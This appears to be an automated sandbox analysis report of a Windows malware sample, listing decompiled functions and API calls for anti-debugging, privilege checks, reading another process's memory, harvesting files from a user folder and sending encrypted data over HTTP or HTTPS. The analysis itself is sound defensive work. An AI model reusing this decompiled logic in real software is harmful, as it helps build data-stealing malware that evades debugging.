      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420B80, Relevance: 19.6, APIs: 13, Instructions: 138window
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 00420B8F
    • SendMessageA.USER32(000000FF,00000229,00000000,?), ref: 00420BC9
    • GetWindowLongA.USER32(?,000000F0), ref: 00420BD1
    • IsWindowVisible.USER32(?), ref: 00420C04
    • IsIconic.USER32(?), ref: 00420C1C
    • ShowWindow.USER32(?,000000FF), ref: 00420C4A
    • SendMessageA.USER32(000000FF,00000234,00000000,00000000), ref: 00420C6B
    • GetWindowLongA.USER32(?,000000F0), ref: 00420C73
    • SendMessageA.USER32(000000FF,00000229,00000000,00000000), ref: 00420C92
    • SendMessageA.USER32(?,00000224,00000000,00000000), ref: 00420CA7
    • SendMessageA.USER32(000000FF,00000229,00000000,00000000), ref: 00420CB6
    • SendMessageA.USER32(00000000), ref: 00420CEF
      • Part of subcall function 00419340: SendMessageA.USER32(?,00000230,?,00000000), ref: 00419364
      • Part of subcall function 00419340: SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00419373
      • Part of subcall function 00419340: GetParent.USER32(?), ref: 00419379
      • Part of subcall function 00419340: DrawMenuBar.USER32(00000000), ref: 00419380
    • GetParent.USER32(000000FF), ref: 00420CE8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004041C8, Relevance: 15.1, APIs: 10, Instructions: 87thread
    C-Code - Quality: 100%
    			E004041C8(intOrPtr* __eax) {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t52;

				 *__eax =  *__eax + __eax;
				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E004013DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t52 =  *_v16 - 1;
						if(_t52 >= 0) {
							_v36 = _t52 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L11;
							}
							_v5 = 1;
						}
						L11:
						FreeSid(_v24);
					}
					E00401440(_v16);
				}
				return _v5;
			}












    0x004041ca
    0x004041d2
    0x004041eb
    0x004041f2
    0x00404214
    0x00404214
    0x0040421b
    0x0040422b
    0x00404247
    0x0040424e
    0x00404258
    0x00404278
    0x00404283
    0x00404286
    0x00404289
    0x0040428c
    0x00404293
    0x004042b2
    0x004042b5
    0x004042b5
    0x004042b8
    0x00000000
    0x00000000
    0x00000000
    0x004042b8
    0x004042ac
    0x004042ac
    0x004042ba
    0x004042be
    0x004042be
    0x004042c7
    0x004042c7
    0x004042d2

    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004239DD, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92library
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00423A06
    • GetSystemInfo.KERNEL32(?), ref: 00423A1E
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00423A2E
    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00423A3E
    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 00423A90
    • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 00423AA5
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00429814, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58LIBRARYCODE
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 0042FAF6
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
    • UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
    • GetCurrentProcess.KERNEL32 ref: 0042FB32
    • TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00404406, Relevance: 9.1, APIs: 6, Instructions: 85
    C-Code - Quality: 64%
    			E00404406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x40a0d4; // 0x401cb4
					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L6:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L6;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}














    0x0040440e
    0x00404411
    0x00404416
    0x00404427
    0x0040444d
    0x00404453
    0x0040445b
    0x00404461
    0x004044bb
    0x00404463
    0x00404465
    0x00404478
    0x00404480
    0x00404486
    0x004044a8
    0x004044ac
    0x004044b2
    0x00404488
    0x00404498
    0x004044a0
    0x004044a6
    0x00000000
    0x00000000
    0x004044a6
    0x00404486
    0x004044c6
    0x004044cb
    0x004044d7
    0x004044df
    0x004044df
    0x004044e5
    0x004044e5
    0x004044ee

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00405640, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
    C-Code - Quality: 91%
    			E00405640(char* __eax, void* __ecx, void* __edx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v609;
				char _v866;
				intOrPtr _t68;
				int _t81;
				intOrPtr _t89;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				void* _t135;

				_v8 = __eax;
				_v12 = 0;
				 *_v8 = 0;
				 *0x40b21c(0,  &_v609, 0x1a, 0xffffffff);
				_t68 =  *0x40a188; // 0x401e60
				E0040133C( &_v609, _t68);
				_t135 = _t134 + 8;
				_v352.dwFileAttributes = 0x80;
				_v16 = FindFirstFileA( &_v609,  &_v352);
				 *((char*)(_t133 + E004012DC( &_v609) - 0x25e)) = 0;
				if(_v16 == 0xffffffff) {
					L12:
					FindClose(_v16);
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_v352.cFileName == 0x2e) {
						goto L11;
					}
					E00401308( &_v866,  &_v609);
					E0040133C( &_v866,  &(_v352.cFileName));
					_t89 =  *0x40a178; // 0x401e20
					E0040133C( &_v866, _t89);
					_t135 = _t135 + 0x10;
					if(E00403988( &_v866) == 0) {
						goto L11;
					}
					_v24 = E004047AC( &_v866,  &_v20);
					if(_v24 <= 0) {
						goto L11;
					}
					 *((char*)(_v20 + _v24)) = 0;
					_t127 =  *0x40a17c; // 0x401e2c
					_v28 = E00401110(_v20, _t127);
					if(_v28 == 0) {
						E00401828(_v20);
						goto L11;
					}
					_v28 = _v28 + 0xd;
					if( *_v28 == 0x31) {
						_t128 =  *0x40a180; // 0x401e3c
						_v28 = E00401110(_v20, _t128);
						if(_v28 != 0) {
							_v28 = _v28 + 0xe;
							_v32 = E00401110(_v28, E0040584C);
							 *_v32 = 0;
							E00401308(_v8, _v28);
							 *_v32 = 0x22;
							_t131 =  *0x40a184; // 0x401e4c
							_v28 = E00401110(_v20, _t131);
							if(_v28 != 0) {
								_v28 = _v28 + 0x12;
								_v32 = E00401110(_v28, 0x405850);
								 *_v32 = 0;
								E0040133C(_v8, 0x405854);
								E0040133C(_v8, _v28);
								_v12 = 0xffffffff;
							}
						}
					}
					E00401828(_v20);
					goto L12;
					L11:
					_t81 = FindNextFileA(_v16,  &_v352);
					asm("sbb eax, eax");
				} while ( ~( ~_t81) != 0);
				goto L12;
			}






















    0x00405649
    0x0040564e
    0x00405654
    0x00405664
    0x0040566a
    0x00405677
    0x0040567c
    0x0040567f
    0x0040569d
    0x004056ab
    0x004056b7
    0x00405839
    0x0040583d
    0x00405849
    0x00000000
    0x00000000
    0x00000000
    0x004056bd
    0x004056bd
    0x004056c4
    0x00000000
    0x00000000
    0x004056d6
    0x004056e9
    0x004056f1
    0x004056fe
    0x00405703
    0x00405713
    0x00000000
    0x00000000
    0x00405727
    0x0040572e
    0x00000000
    0x00000000
    0x0040573a
    0x0040573e
    0x0040574c
    0x00405753
    0x00405815
    0x00000000
    0x00405815
    0x00405759
    0x00405763
    0x00405769
    0x00405777
    0x0040577e
    0x00405784
    0x00405795
    0x0040579b
    0x004057a4
    0x004057ac
    0x004057af
    0x004057bd
    0x004057c4
    0x004057c6
    0x004057d7
    0x004057dd
    0x004057e9
    0x004057f9
    0x00405801
    0x00405801
    0x004057c4
    0x0040577e
    0x0040580b
    0x00000000
    0x0040581a
    0x00405825
    0x0040582d
    0x00405831
    0x00000000

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
    • FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
    • FindClose.KERNEL32(000000FF), ref: 0040583D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00417E60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86comnativestring
    APIs
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F10
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F23
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00404DE0, Relevance: 6.1, APIs: 4, Instructions: 69native
    C-Code - Quality: 100%
    			E00404DE0(void* __eax, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v12 = 0;
				E00401258( &_v52, 0x18);
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
				if(_v16 == 0 && _v48 != 0) {
					_v20 = _v48 + 8;
					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
					_v20 = _v28 + 0x3c;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v20 = _v20 + _v28 + 0x28;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v12 = _v20 + _v28;
				}
				return _v12;
			}











    0x00404de6
    0x00404deb
    0x00404df6
    0x00404e0f
    0x00404e16
    0x00404e24
    0x00404e39
    0x00404e45
    0x00404e5a
    0x00404e69
    0x00404e7e
    0x00404e8a
    0x00404e8a
    0x00404e93

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0041E9C0, Relevance: 6.0, APIs: 4, Instructions: 44
    APIs
    • IsWindow.USER32(0000E900), ref: 0041E9D0
    • IsWindow.USER32(?), ref: 0041E9E3
    • GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00424FEB, Relevance: 4.6, APIs: 3, Instructions: 75LIBRARYCODE
    APIs
    • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004250D5
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 004250DF
    • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 004250EC
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00410190, Relevance: 4.5, APIs: 3, Instructions: 35
    APIs
    • IsWindow.USER32(?), ref: 0041019A
    • GetWindowLongA.USER32(?,000000FC), ref: 004101B4
    • SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00405D20, Relevance: 4.2, Strings: 3, Instructions: 433Crypto
    C-Code - Quality: 98%
    			E00405D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v168;
				char _v184;
				char _v200;
				char _v204;
				char _v269;
				char _v285;
				char _v301;
				char _v317;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				char _v336;
				char _v849;
				intOrPtr _t239;
				signed int _t250;
				char _t255;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t259;
				signed int _t330;
				intOrPtr _t436;
				intOrPtr _t438;
				void* _t470;

				_v8 = 0;
				if(_a16 == 0) {
					L40:
					return _v8;
				}
				_v64 = 0;
				if(_a20 == 0) {
					__eflags = 0;
					_v28 = 0;
					L9:
					_v60 = E00401110(_a16, E0040633C);
					_t474 = _v60;
					if(_v60 == 0) {
						goto L40;
					}
					_v32 = _v60 - _a16;
					E004012B8( &_v269, _v32, _a16);
					 *((char*)(_t470 + _v32 - 0x109)) = 0;
					E00401308( &_v849, _v60);
					E004054B8( &_v849, _v60, _t474);
					E00405858( &_v301, 0x10);
					E00405858( &_v317, 0x10);
					E004012B8( &_v184, 0x10,  &_v301);
					E004012B8( &_v200, 0x10,  &_v317);
					_v204 = _a28;
					if(_a12 != 0) {
						E004012B8( &_v168, 0x51, _a12);
					}
					E004017E8( &_v48, 0, 0, 0xf0000000, 1);
					E004018A0(_v48, 0x94, _a8,  &_v56, 0, 0);
					_v32 = 0x75;
					E00401AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
					E00401AF8(_v56);
					E00401B20(_v48, 0);
					E00401268( &_v204, 0x80);
					_t239 =  *0x40a1c0; // 0x401f00
					_v12 = E00403864(_t239, _v28, _v64, 0, 0);
					_v28 = 1;
					E0040170C(_v12,  &_v28, 0x46, 4);
					_v28 = 0x1770;
					E0040170C(_v12,  &_v28, 2, 4);
					_v28 = 0x1f40;
					E0040170C(_v12,  &_v28, 6, 4);
					E0040170C(_v12,  &_v28, 5, 4);
					_v28 = 1;
					_t250 = E0040170C(_v12,  &_v28, 0x4d, 4);
					asm("sbb eax, eax");
					if( ~( ~_t250) == 0) {
						_v76 = 1;
						_v72 = 0;
						E0040170C(0,  &_v76, 0x32, 8);
					}
					if(_a4 == 0) {
						_v28 = 0x50;
					} else {
						_v28 = 0x1bb;
					}
					_v16 = E0040161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
					if(_a4 == 0) {
						_v28 = 0x4600000;
					} else {
						_v28 = 0x4e03000;
					}
					_t255 =  *0x40a1c4; // 0x401f48
					_v336 = _t255;
					_t256 =  *0x40a1c8; // 0x401f54
					_v332 = _t256;
					_t257 =  *0x40a1cc; // 0x401f6c
					_v328 = _t257;
					_v324 = 0;
					_t259 =  *0x40a23c; // 0x40209c
					_t436 =  *0x40a1ac; // 0x401ed4
					_v20 = E00401660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
					if(_a4 != 0) {
						_v32 = 4;
						E004016D8(_v20,  &_v28, 0x1f,  &_v32);
						_v28 = _v28 | 0x00000100;
						E0040170C(_v20,  &_v28, 0x1f, 4);
					}
					_t482 = _a24;
					if(_a24 == 0) {
						_v68 = E004013DC(_v32 + 0x80);
						_t397 = 0x80;
						E004012B8(_v68, 0x80,  &_v204);
						__eflags = 0;
						_v32 = 0;
					} else {
						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
						_v68 = E004013DC(_v32 + 0x80);
						E004012B8(_v68, 0x80,  &_v204);
						_t397 =  &_v301;
						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
					}
					_t438 =  *0x40a1d0; // 0x401f70
					if(E004015E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
						E00401440(_v68);
						_v32 = 4;
						_v24 = 0;
						_v28 = 0;
						E004039CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
						__eflags = _v24 - 0x12e;
						if(_v24 != 0x12e) {
							goto L39;
						}
						_v40 = E004013DC(0x1000);
						__eflags = 0;
						_v36 = 0;
						while(1) {
							_v44 = E004016A4(_v20, 0,  &_v32, 0);
							asm("sbb eax, eax");
							__eflags =  ~( ~_v44);
							if( ~( ~_v44) == 0) {
								goto L39;
							}
							__eflags = _v44;
							if(_v44 == 0) {
								continue;
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _v36 - 0x20;
								if(_v36 >= 0x20) {
									 *_a32 = E004013DC(_v36 + 1);
									 *_a36 = _v36;
									E004059BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
									E004017E8( &_v48, 0, 0, 0xf0000000, 1);
									E00401374(_v48, 0, 0x8003,  &_v52, 0);
									E00401404(_v52, 0x10,  &_v301, 0);
									E00401404(_v52, 0x10,  &_v317, 0);
									E00401404(_v52, E004012DC( &_v269),  &_v269, 0);
									E00401404(_v52,  *_a36,  *_a32, 0);
									_v32 = 0x10;
									E00401490(_v52,  &_v285, 2, 0,  &_v32);
									E004014D0(_v52);
									E00401B20(_v48, 0);
									_t330 = E004011F8( &_v285, 0x10, _v40);
									__eflags = _t330;
									if(_t330 != 0) {
										E00401440(_v40);
										 *((char*)( *_a32 +  *_a36)) = 0;
										_v8 = 0xffffffff;
									} else {
										E00401440(_v40);
										E00401440( *_a32);
										 *_a32 = 0;
										 *_a36 = 0;
									}
								} else {
									E00401440(_v40);
								}
								goto L39;
							}
							__eflags = _v36 + _v32 - 0x200000;
							if(_v36 + _v32 > 0x200000) {
								goto L39;
							}
							_v40 = E00401460(_v40, _v36 + _v32);
							E004015B0(_v20, _v32, _v40 + _v36,  &_v32);
							_v36 = _v36 + _v32;
						}
						goto L39;
					} else {
						E00401440(_v68);
						L39:
						E0040151C(_v20);
						E0040151C(_v16);
						E0040151C(_v12);
						goto L40;
					}
				}
				if( *_a20 != 1) {
					__eflags =  *_a20 - 2;
					if( *_a20 != 2) {
						__eflags =  *_a20 - 3;
						if( *_a20 != 3) {
							goto L40;
						}
						_v28 = 3;
						_v64 = _a20 + 4;
						goto L9;
					}
					_v28 = 0;
				} else {
					_v28 = 1;
				}
			}












































    0x00405d2b
    0x00405d32
    0x00406332
    0x00406338
    0x00406338
    0x00405d3a
    0x00405d41
    0x00405d81
    0x00405d83
    0x00405d86
    0x00405d93
    0x00405d96
    0x00405d9a
    0x00000000
    0x00000000
    0x00405da6
    0x00405db5
    0x00405dbd
    0x00405dce
    0x00405dd9
    0x00405de9
    0x00405df9
    0x00405e0f
    0x00405e25
    0x00405e2d
    0x00405e37
    0x00405e47
    0x00405e47
    0x00405e5a
    0x00405e72
    0x00405e77
    0x00405e98
    0x00405ea0
    0x00405eaa
    0x00405eba
    0x00405ecb
    0x00405ed6
    0x00405ed9
    0x00405eed
    0x00405ef2
    0x00405f06
    0x00405f0b
    0x00405f1f
    0x00405f31
    0x00405f36
    0x00405f4a
    0x00405f51
    0x00405f57
    0x00405f59
    0x00405f62
    0x00405f71
    0x00405f71
    0x00405f7a
    0x00405f85
    0x00405f7c
    0x00405f7c
    0x00405f7c
    0x00405fa8
    0x00405faf
    0x00405fba
    0x00405fb1
    0x00405fb1
    0x00405fb1
    0x00405fc1
    0x00405fc6
    0x00405fcc
    0x00405fd1
    0x00405fd7
    0x00405fdc
    0x00405fe4
    0x00405fea
    0x00406005
    0x00406013
    0x0040601a
    0x0040601c
    0x00406032
    0x00406037
    0x0040604b
    0x0040604b
    0x00406050
    0x00406054
    0x004060bd
    0x004060c6
    0x004060ce
    0x004060d3
